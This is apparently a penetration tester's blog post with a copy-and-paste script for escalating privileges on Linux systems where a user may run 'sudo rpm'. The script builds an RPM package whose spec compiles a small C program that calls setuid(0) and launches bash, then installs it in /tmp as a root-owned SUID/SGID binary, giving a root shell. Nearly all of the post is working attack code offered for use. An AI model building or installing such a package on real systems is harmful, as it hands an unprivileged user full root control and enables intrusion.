Leveraging 'sudo rpm' for privilege escalation

This post is a bit of a break from all the VertX stuff I've been doing. Awhile ago I wrote this little copy and pasteable thing to aid out on internal pen tests. On one engagement, I had local access to a system but not root. The user i was logged in as also had the ability to use rpm via sudo. So an easy priv escalation method is to install an RPM that contains a SUID shell.

If you copy and paste it into a shell on your local system, it'll create the rpm (your rpm will be ~/rpm/RPMS/i386/suidshell/suidshell-0.1-1.i386.rpm), then just copy it over to your target system. After you install it, the shell will be in /tmp.

cd ~/
mkdir rpm rpm/BUILD rpm/RPMS rpm/SOURCES rpm/SPECS rpm/SRPMS rpm/tmp
cat > .rpmmacros <<EOF
%_topdir               /root/rpm
%_tmppath              /root/rpm/tmp
EOF
cd rpm
cat > SPECS/suidshell.spec << --EOF--
%define name suidshell
%define version 0.1
%define release 1

Summary: SUID bash shell
Name: %{name}
Version: %{version}
Release: %{release}
License: LGPL
Group: System Environment/Libraries
Vendor: Brad Antoniewicz

%Description
This was originally designed to so that if a user has 'sudo rpm' access they can easily escalate privs to root.

-Depends
requires BASH in /bin/bash


Creates a root shell in /tmp

By Brad Antoniewicz
Foundstone

%build
cat > suidshell.c << EOF
#include <stdio.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF
gcc -o suidshell suidshell.c

%install
install suidshell /tmp/suidshell
chown root:root /tmp/suidshell
chmod 6755 /tmp/suidshell

%files
/tmp/suidshell

--EOF--
rpmbuild -ba SPECS/suidshell.spec